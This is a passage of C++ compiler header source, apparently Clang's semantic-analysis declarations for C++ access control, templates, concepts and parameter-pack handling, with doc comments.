/// CheckForFunctionMarkedFinal - Checks whether a virtual member function
/// overrides a virtual member function marked 'final', according to
/// C++11 [class.virtual]p4.
bool CheckIfOverriddenFunctionIsMarkedFinal(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
//===--------------------------------------------------------------------===//
// C++ Access Control
//
enum AccessResult {
AR_accessible,
AR_inaccessible,
AR_dependent,
AR_delayed
};
bool SetMemberAccessSpecifier(NamedDecl *MemberDecl,
NamedDecl *PrevMemberDecl,
AccessSpecifier LexicalAS);
AccessResult CheckUnresolvedMemberAccess(UnresolvedMemberExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckUnresolvedLookupAccess(UnresolvedLookupExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckAllocationAccess(SourceLocation OperatorLoc,
SourceRange PlacementRange,
CXXRecordDecl *NamingClass,
DeclAccessPair FoundDecl,
bool Diagnose = true);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
bool IsCopyBindingRefToTemp = false);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
const PartialDiagnostic &PDiag);
AccessResult CheckDestructorAccess(SourceLocation Loc,
CXXDestructorDecl *Dtor,
const PartialDiagnostic &PDiag,
QualType objectType = QualType());
AccessResult CheckFriendAccess(NamedDecl *D);
AccessResult CheckMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *NamingClass,
DeclAccessPair Found);
AccessResult
CheckStructuredBindingMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *DecomposedClass,
DeclAccessPair Field);
AccessResult CheckMemberOperatorAccess(SourceLocation Loc,
Expr *ObjectExpr,
Expr *ArgExpr,
DeclAccessPair FoundDecl);
AccessResult CheckAddressOfMemberAccess(Expr *OvlExpr,
DeclAccessPair FoundDecl);
AccessResult CheckBaseClassAccess(SourceLocation AccessLoc,
QualType Base, QualType Derived,
const CXXBasePath &Path,
unsigned DiagID,
bool ForceCheck = false,
bool ForceUnprivileged = false);
void CheckLookupAccess(const LookupResult &R);
bool IsSimplyAccessible(NamedDecl *Decl, CXXRecordDecl *NamingClass,
QualType BaseType);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found, QualType ObjectType,
SourceLocation Loc,
const PartialDiagnostic &Diag);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found,
QualType ObjectType) {
return isMemberAccessibleForDeletion(NamingClass, Found, ObjectType,
SourceLocation(), PDiag());
}
void HandleDependentAccessCheck(const DependentDiagnostic &DD,
const MultiLevelTemplateArgumentList &TemplateArgs);
void PerformDependentDiagnostics(const DeclContext *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
void HandleDelayedAccessCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
/// When true, access checking violations are treated as SFINAE
/// failures rather than hard errors.
bool AccessCheckingSFINAE;
enum AbstractDiagSelID {
AbstractNone = -1,
AbstractReturnType,
AbstractParamType,
AbstractVariableType,
AbstractFieldType,
AbstractIvarType,
AbstractSynthesizedIvarType,
AbstractArrayType
};
bool isAbstractType(SourceLocation Loc, QualType T);
bool RequireNonAbstractType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
template <typename... Ts>
bool RequireNonAbstractType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireNonAbstractType(Loc, T, Diagnoser);
}
void DiagnoseAbstractType(const CXXRecordDecl *RD);
//===--------------------------------------------------------------------===//
// C++ Overloaded Operators [C++ 13.5]
//
bool CheckOverloadedOperatorDeclaration(FunctionDecl *FnDecl);
bool CheckLiteralOperatorDeclaration(FunctionDecl *FnDecl);
//===--------------------------------------------------------------------===//
// C++ Templates [C++ 14]
//
void FilterAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
bool hasAnyAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true,
bool AllowNonTemplateFunctions = false);
/// Try to interpret the lookup result D as a template-name.
///
/// \param D A declaration found by name lookup.
/// \param AllowFunctionTemplates Whether function templates should be
/// considered valid results.
/// \param AllowDependent Whether unresolved using declarations (that might
/// name templates) should be considered valid results.
NamedDecl *getAsTemplateNameDecl(NamedDecl *D,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
enum TemplateNameIsRequiredTag { TemplateNameIsRequired };
/// Whether and why a template name is required in this lookup.
class RequiredTemplateKind {
public:
/// Template name is required if TemplateKWLoc is valid.
RequiredTemplateKind(SourceLocation TemplateKWLoc = SourceLocation())
: TemplateKW(TemplateKWLoc) {}
/// Template name is unconditionally required.
RequiredTemplateKind(TemplateNameIsRequiredTag) : TemplateKW() {}
SourceLocation getTemplateKeywordLoc() const {
return TemplateKW.getValueOr(SourceLocation());
}
bool hasTemplateKeyword() const { return getTemplateKeywordLoc().isValid(); }
bool isRequired() const { return TemplateKW != SourceLocation(); }
explicit operator bool() const { return isRequired(); }
private:
llvm::Optional<SourceLocation> TemplateKW;
};
enum class AssumedTemplateKind {
/// This is not assumed to be a template name.
None,
/// This is assumed to be a template name because lookup found nothing.
FoundNothing,
/// This is assumed to be a template name because lookup found one or more
/// functions (but no function templates).
FoundFunctions,
};
bool LookupTemplateName(
LookupResult &R, Scope *S, CXXScopeSpec &SS, QualType ObjectType,
bool EnteringContext, bool &MemberOfUnknownSpecialization,
RequiredTemplateKind RequiredTemplate = SourceLocation(),
AssumedTemplateKind *ATK = nullptr, bool AllowTypoCorrection = true);
TemplateNameKind isTemplateName(Scope *S,
CXXScopeSpec &SS,
bool hasTemplateKeyword,
const UnqualifiedId &Name,
ParsedType ObjectType,
bool EnteringContext,
TemplateTy &Template,
bool &MemberOfUnknownSpecialization,
bool Disambiguation = false);
/// Try to resolve an undeclared template name as a type template.
///
/// Sets II to the identifier corresponding to the template name, and updates
/// Name to a corresponding (typo-corrected) type template name and TNK to
/// the corresponding kind, if possible.
void ActOnUndeclaredTypeTemplateName(Scope *S, TemplateTy &Name,
TemplateNameKind &TNK,
SourceLocation NameLoc,
IdentifierInfo *&II);
bool resolveAssumedTemplateNameAsType(Scope *S, TemplateName &Name,
SourceLocation NameLoc,
bool Diagnose = true);
/// Determine whether a particular identifier might be the name in a C++1z
/// deduction-guide declaration.
bool isDeductionGuideName(Scope *S, const IdentifierInfo &Name,
SourceLocation NameLoc,
ParsedTemplateTy *Template = nullptr);
bool DiagnoseUnknownTemplateName(const IdentifierInfo &II,
SourceLocation IILoc,
Scope *S,
const CXXScopeSpec *SS,
TemplateTy &SuggestedTemplate,
TemplateNameKind &SuggestedKind);
bool DiagnoseUninstantiableTemplate(SourceLocation PointOfInstantiation,
NamedDecl *Instantiation,
bool InstantiatedFromMember,
const NamedDecl *Pattern,
const NamedDecl *PatternDef,
TemplateSpecializationKind TSK,
bool Complain = true);
void DiagnoseTemplateParameterShadow(SourceLocation Loc, Decl *PrevDecl);
TemplateDecl *AdjustDeclIfTemplate(Decl *&Decl);
NamedDecl *ActOnTypeParameter(Scope *S, bool Typename,
SourceLocation EllipsisLoc,
SourceLocation KeyLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth, unsigned Position,
SourceLocation EqualLoc,
ParsedType DefaultArg, bool HasTypeConstraint);
bool ActOnTypeConstraint(const CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(NestedNameSpecifierLoc NS,
DeclarationNameInfo NameInfo,
ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(AutoTypeLoc TL,
NonTypeTemplateParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
QualType CheckNonTypeTemplateParameterType(TypeSourceInfo *&TSI,
SourceLocation Loc);
QualType CheckNonTypeTemplateParameterType(QualType T, SourceLocation Loc);
NamedDecl *ActOnNonTypeTemplateParameter(Scope *S, Declarator &D,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
Expr *DefaultArg);
NamedDecl *ActOnTemplateTemplateParameter(Scope *S,
SourceLocation TmpLoc,
TemplateParameterList *Params,
SourceLocation EllipsisLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
ParsedTemplateArgument DefaultArg);
TemplateParameterList *
ActOnTemplateParameterList(unsigned Depth,
SourceLocation ExportLoc,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> Params,
SourceLocation RAngleLoc,
Expr *RequiresClause);
/// The context in which we are checking a template parameter list.
enum TemplateParamListContext {
TPC_ClassTemplate,
TPC_VarTemplate,
TPC_FunctionTemplate,
TPC_ClassTemplateMember,
TPC_FriendClassTemplate,
TPC_FriendFunctionTemplate,
TPC_FriendFunctionTemplateDefinition,
TPC_TypeAliasTemplate
};
bool CheckTemplateParameterList(TemplateParameterList *NewParams,
TemplateParameterList *OldParams,
TemplateParamListContext TPC,
SkipBodyInfo *SkipBody = nullptr);
TemplateParameterList *MatchTemplateParametersToScopeSpecifier(
SourceLocation DeclStartLoc, SourceLocation DeclLoc,
const CXXScopeSpec &SS, TemplateIdAnnotation *TemplateId,
ArrayRef<TemplateParameterList *> ParamLists,
bool IsFriend, bool &IsMemberSpecialization, bool &Invalid,
bool SuppressDiagnostic = false);
DeclResult CheckClassTemplate(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name, SourceLocation NameLoc,
const ParsedAttributesView &Attr, TemplateParameterList *TemplateParams,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
SourceLocation FriendLoc, unsigned NumOuterTemplateParamLists,
TemplateParameterList **OuterTemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
TemplateArgumentLoc getTrivialTemplateArgumentLoc(const TemplateArgument &Arg,
QualType NTTPType,
SourceLocation Loc);
/// Get a template argument mapping the given template parameter to itself,
/// e.g. for X in \c template<int X>, this would return an expression template
/// argument referencing X.
TemplateArgumentLoc getIdentityTemplateArgumentLoc(NamedDecl *Param,
SourceLocation Location);
void translateTemplateArguments(const ASTTemplateArgsPtr &In,
TemplateArgumentListInfo &Out);
ParsedTemplateArgument ActOnTemplateTypeArgument(TypeResult ParsedType);
void NoteAllFoundTemplates(TemplateName Name);
QualType CheckTemplateIdType(TemplateName Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs);
TypeResult
ActOnTemplateIdType(Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
TemplateTy Template, IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc, SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs, SourceLocation RAngleLoc,
bool IsCtorOrDtorName = false, bool IsClassName = false);
/// Parsed an elaborated-type-specifier that refers to a template-id,
/// such as \c class T::template apply<U>.
TypeResult ActOnTagTemplateIdType(TagUseKind TUK,
TypeSpecifierType TagSpec,
SourceLocation TagLoc,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateD,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgsIn,
SourceLocation RAngleLoc);
DeclResult ActOnVarTemplateSpecialization(
Scope *S, Declarator &D, TypeSourceInfo *DI,
SourceLocation TemplateKWLoc, TemplateParameterList *TemplateParams,
StorageClass SC, bool IsPartialSpecialization);
DeclResult CheckVarTemplateId(VarTemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation TemplateNameLoc,
const TemplateArgumentListInfo &TemplateArgs);
ExprResult CheckVarTemplateId(const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
VarTemplateDecl *Template,
SourceLocation TemplateLoc,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult
CheckConceptTemplateId(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &ConceptNameInfo,
NamedDecl *FoundDecl, ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs);
void diagnoseMissingTemplateArguments(TemplateName Name, SourceLocation Loc);
ExprResult BuildTemplateIdExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
bool RequiresADL,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildQualifiedTemplateIdExpr(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
TemplateNameKind ActOnTemplateName(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
const UnqualifiedId &Name, ParsedType ObjectType, bool EnteringContext,
TemplateTy &Template, bool AllowInjectedClassName = false);
DeclResult ActOnClassTemplateSpecialization(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
SourceLocation ModulePrivateLoc, CXXScopeSpec &SS,
TemplateIdAnnotation &TemplateId, const ParsedAttributesView &Attr,
MultiTemplateParamsArg TemplateParameterLists,
SkipBodyInfo *SkipBody = nullptr);
bool CheckTemplatePartialSpecializationArgs(SourceLocation Loc,
TemplateDecl *PrimaryTemplate,
unsigned NumExplicitArgs,
ArrayRef<TemplateArgument> Args);
void CheckTemplatePartialSpecialization(
ClassTemplatePartialSpecializationDecl *Partial);
void CheckTemplatePartialSpecialization(
VarTemplatePartialSpecializationDecl *Partial);
Decl *ActOnTemplateDeclarator(Scope *S,
MultiTemplateParamsArg TemplateParameterLists,
Declarator &D);
bool
CheckSpecializationInstantiationRedecl(SourceLocation NewLoc,
TemplateSpecializationKind NewTSK,
NamedDecl *PrevDecl,
TemplateSpecializationKind PrevTSK,
SourceLocation PrevPtOfInstantiation,
bool &SuppressNew);
bool CheckDependentFunctionTemplateSpecialization(FunctionDecl *FD,
const TemplateArgumentListInfo &ExplicitTemplateArgs,
LookupResult &Previous);
bool CheckFunctionTemplateSpecialization(
FunctionDecl *FD, TemplateArgumentListInfo *ExplicitTemplateArgs,
LookupResult &Previous, bool QualifiedFriend = false);
bool CheckMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
void CompleteMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
DeclResult ActOnExplicitInstantiation(
Scope *S, SourceLocation ExternLoc, SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc, const CXXScopeSpec &SS,
TemplateTy Template, SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc, ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc, const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S, SourceLocation ExternLoc,
SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
Declarator &D);
TemplateArgumentLoc
SubstDefaultTemplateArgumentIfAvailable(TemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
Decl *Param,
SmallVectorImpl<TemplateArgument>
&Converted,
bool &HasDefaultArg);
/// Specifies the context in which a particular template
/// argument is being checked.
enum CheckTemplateArgumentKind {
/// The template argument was specified in the code or was
/// instantiated with some deduced template arguments.
CTAK_Specified,
/// The template argument was deduced via template argument
/// deduction.
CTAK_Deduced,
/// The template argument was deduced from an array bound
/// via template argument deduction.
CTAK_DeducedFromArrayBound
};
bool CheckTemplateArgument(NamedDecl *Param,
TemplateArgumentLoc &Arg,
NamedDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
unsigned ArgumentPackIndex,
SmallVectorImpl<TemplateArgument> &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
/// Check that the given template arguments can be be provided to
/// the given template, converting the arguments along the way.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateLoc The location of the template name in the source.
///
/// \param TemplateArgs The list of template arguments. If the template is
/// a template template parameter, this function may extend the set of
/// template arguments to also include substituted, defaulted template
/// arguments.
///
/// \param PartialTemplateArgs True if the list of template arguments is
/// intentionally partial, e.g., because we're checking just the initial
/// set of template arguments.
///
/// \param Converted Will receive the converted, canonicalized template
/// arguments.
///
/// \param UpdateArgsWithConversions If \c true, update \p TemplateArgs to
/// contain the converted forms of the template arguments as written.
/// Otherwise, \p TemplateArgs will not be modified.
///
/// \param ConstraintsNotSatisfied If provided, and an error occured, will
/// receive true if the cause for the error is the associated constraints of
/// the template not being satisfied by the template arguments.
///
/// \returns true if an error occurred, false otherwise.
bool CheckTemplateArgumentList(TemplateDecl *Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs,
bool PartialTemplateArgs,
SmallVectorImpl<TemplateArgument> &Converted,
bool UpdateArgsWithConversions = true,
bool *ConstraintsNotSatisfied = nullptr);
bool CheckTemplateTypeArgument(TemplateTypeParmDecl *Param,
TemplateArgumentLoc &Arg,
SmallVectorImpl<TemplateArgument> &Converted);
bool CheckTemplateArgument(TemplateTypeParmDecl *Param,
TypeSourceInfo *Arg);
ExprResult CheckTemplateArgument(NonTypeTemplateParmDecl *Param,
QualType InstantiatedParamType, Expr *Arg,
TemplateArgument &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
bool CheckTemplateTemplateArgument(TemplateTemplateParmDecl *Param,
TemplateParameterList *Params,
TemplateArgumentLoc &Arg);
ExprResult
BuildExpressionFromDeclTemplateArgument(const TemplateArgument &Arg,
QualType ParamType,
SourceLocation Loc);
ExprResult
BuildExpressionFromIntegralTemplateArgument(const TemplateArgument &Arg,
SourceLocation Loc);
/// Enumeration describing how template parameter lists are compared
/// for equality.
enum TemplateParameterListEqualKind {
/// We are matching the template parameter lists of two templates
/// that might be redeclarations.
///
/// \code
/// template<typename T> struct X;
/// template<typename T> struct X;
/// \endcode
TPL_TemplateMatch,
/// We are matching the template parameter lists of two template
/// template parameters as part of matching the template parameter lists
/// of two templates that might be redeclarations.
///
/// \code
/// template<template<int I> class TT> struct X;
/// template<template<int Value> class Other> struct X;
/// \endcode
TPL_TemplateTemplateParmMatch,
/// We are matching the template parameter lists of a template
/// template argument against the template parameter lists of a template
/// template parameter.
///
/// \code
/// template<template<int Value> class Metafun> struct X;
/// template<int Value> struct integer_c;
/// X<integer_c> xic;
/// \endcode
TPL_TemplateTemplateArgumentMatch
};
bool TemplateParameterListsAreEqual(TemplateParameterList *New,
TemplateParameterList *Old,
bool Complain,
TemplateParameterListEqualKind Kind,
SourceLocation TemplateArgLoc
= SourceLocation());
bool CheckTemplateDeclScope(Scope *S, TemplateParameterList *TemplateParams);
/// Called when the parser has parsed a C++ typename
/// specifier, e.g., "typename T::type".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param II the identifier we're retrieving (e.g., 'type' in the example).
/// \param IdLoc the location of the identifier.
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS, const IdentifierInfo &II,
SourceLocation IdLoc);
/// Called when the parser has parsed a C++ typename
/// specifier that ends in a template-id, e.g.,
/// "typename MetaFun::template apply<T1, T2>".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param TemplateLoc the location of the 'template' keyword, if any.
/// \param TemplateName The template name.
/// \param TemplateII The identifier used to name the template.
/// \param TemplateIILoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateLoc,
TemplateTy TemplateName,
IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
TypeSourceInfo **TSI,
bool DeducedTSTContext);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
bool DeducedTSTContext = true);
TypeSourceInfo *RebuildTypeInCurrentInstantiation(TypeSourceInfo *T,
SourceLocation Loc,
DeclarationName Name);
bool RebuildNestedNameSpecifierInCurrentInstantiation(CXXScopeSpec &SS);
ExprResult RebuildExprInCurrentInstantiation(Expr *E);
bool RebuildTemplateParamsInCurrentInstantiation(
TemplateParameterList *Params);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgumentList &Args);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgument *Args,
unsigned NumArgs);
//===--------------------------------------------------------------------===//
// C++ Concepts
//===--------------------------------------------------------------------===//
Decl *ActOnConceptDefinition(
Scope *S, MultiTemplateParamsArg TemplateParameterLists,
IdentifierInfo *Name, SourceLocation NameLoc, Expr *ConstraintExpr);
RequiresExprBodyDecl *
ActOnStartRequiresExpr(SourceLocation RequiresKWLoc,
ArrayRef<ParmVarDecl *> LocalParameters,
Scope *BodyScope);
void ActOnFinishRequiresExpr();
concepts::Requirement *ActOnSimpleRequirement(Expr *E);
concepts::Requirement *ActOnTypeRequirement(
SourceLocation TypenameKWLoc, CXXScopeSpec &SS, SourceLocation NameLoc,
IdentifierInfo *TypeName, TemplateIdAnnotation *TemplateId);
concepts::Requirement *ActOnCompoundRequirement(Expr *E,
SourceLocation NoexceptLoc);
concepts::Requirement *
ActOnCompoundRequirement(
Expr *E, SourceLocation NoexceptLoc, CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint, unsigned Depth);
concepts::Requirement *ActOnNestedRequirement(Expr *Constraint);
concepts::ExprRequirement *
BuildExprRequirement(
Expr *E, bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::ExprRequirement *
BuildExprRequirement(
concepts::Requirement::SubstitutionDiagnostic *ExprSubstDiag,
bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::TypeRequirement *BuildTypeRequirement(TypeSourceInfo *Type);
concepts::TypeRequirement *
BuildTypeRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
concepts::NestedRequirement *BuildNestedRequirement(Expr *E);
concepts::NestedRequirement *
BuildNestedRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
ExprResult ActOnRequiresExpr(SourceLocation RequiresKWLoc,
RequiresExprBodyDecl *Body,
ArrayRef<ParmVarDecl *> LocalParameters,
ArrayRef<concepts::Requirement *> Requirements,
SourceLocation ClosingBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Variadic Templates (C++0x [temp.variadic])
//===--------------------------------------------------------------------===//
/// Determine whether an unexpanded parameter pack might be permitted in this
/// location. Useful for error recovery.
bool isUnexpandedParameterPackPermitted();
/// The context in which an unexpanded parameter pack is
/// being diagnosed.
///
/// Note that the values of this enumeration line up with the first
/// argument to the \c err_unexpanded_parameter_pack diagnostic.
enum UnexpandedParameterPackContext {
/// An arbitrary expression.
UPPC_Expression = 0,
/// The base type of a class type.
UPPC_BaseType,
/// The type of an arbitrary declaration.
UPPC_DeclarationType,
/// The type of a data member.
UPPC_DataMemberType,
/// The size of a bit-field.
UPPC_BitFieldWidth,
/// The expression in a static assertion.
UPPC_StaticAssertExpression,
/// The fixed underlying type of an enumeration.
UPPC_FixedUnderlyingType,
/// The enumerator value.
UPPC_EnumeratorValue,
/// A using declaration.
UPPC_UsingDeclaration,
/// A friend declaration.
UPPC_FriendDeclaration,
/// A declaration qualifier.
UPPC_DeclarationQualifier,
/// An initializer.
UPPC_Initializer,
/// A default argument.
UPPC_DefaultArgument,
/// The type of a non-type template parameter.
UPPC_NonTypeTemplateParameterType,
/// The type of an exception.
UPPC_ExceptionType,
/// Partial specialization.
UPPC_PartialSpecialization,
/// Microsoft __if_exists.
UPPC_IfExists,
/// Microsoft __if_not_exists.
UPPC_IfNotExists,
/// Lambda expression.
UPPC_Lambda,
/// Block expression,
UPPC_Block,
/// A type constraint,
UPPC_TypeConstraint
};
/// Diagnose unexpanded parameter packs.
///
/// \param Loc The location at which we should emit the diagnostic.
///
/// \param UPPC The context in which we are diagnosing unexpanded
/// parameter packs.
///
/// \param Unexpanded the set of unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPacks(SourceLocation Loc,
UnexpandedParameterPackContext UPPC,
ArrayRef<UnexpandedParameterPack> Unexpanded);
/// If the given type contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The source location where a diagnostc should be emitted.
///
/// \param T The type that is being checked for unexpanded parameter
/// packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc, TypeSourceInfo *T,
UnexpandedParameterPackContext UPPC);
/// If the given expression contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param E The expression that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(Expr *E,
UnexpandedParameterPackContext UPPC = UPPC_Expression);
/// If the given nested-name-specifier contains an unexpanded
/// parameter pack, diagnose the error.
///
/// \param SS The nested-name-specifier that is being checked for
/// unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const CXXScopeSpec &SS,
UnexpandedParameterPackContext UPPC);
/// If the given name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param NameInfo The name (with source location information) that
/// is being checked for unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const DeclarationNameInfo &NameInfo,
UnexpandedParameterPackContext UPPC);
/// If the given template name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The location of the template name.
///
/// \param Template The template name that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc,
TemplateName Template,
UnexpandedParameterPackContext UPPC);
/// If the given template argument contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param Arg The template argument that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(TemplateArgumentLoc Arg,
UnexpandedParameterPackContext UPPC);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgument Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgumentLoc Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param T The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(QualType T,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param TL The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TypeLoc TL,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// nested-name-specifier.
///
/// \param NNS The nested-name-specifier that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(NestedNameSpecifierLoc NNS,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// name.
///
/// \param NameInfo The name that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(const DeclarationNameInfo &NameInfo,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Invoked when parsing a template argument followed by an
/// ellipsis, which creates a pack expansion.
///
/// \param Arg The template argument preceding the ellipsis, which
/// may already be invalid.
///
/// \param EllipsisLoc The location of the ellipsis.
ParsedTemplateArgument ActOnPackExpansion(const ParsedTemplateArgument &Arg,
SourceLocation EllipsisLoc);
/// Invoked when parsing a type followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Type The type preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
TypeResult ActOnPackExpansion(ParsedType Type, SourceLocation EllipsisLoc);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
TypeSourceInfo *CheckPackExpansion(TypeSourceInfo *Pattern,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
QualType CheckPackExpansion(QualType Pattern,
SourceRange PatternRange,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
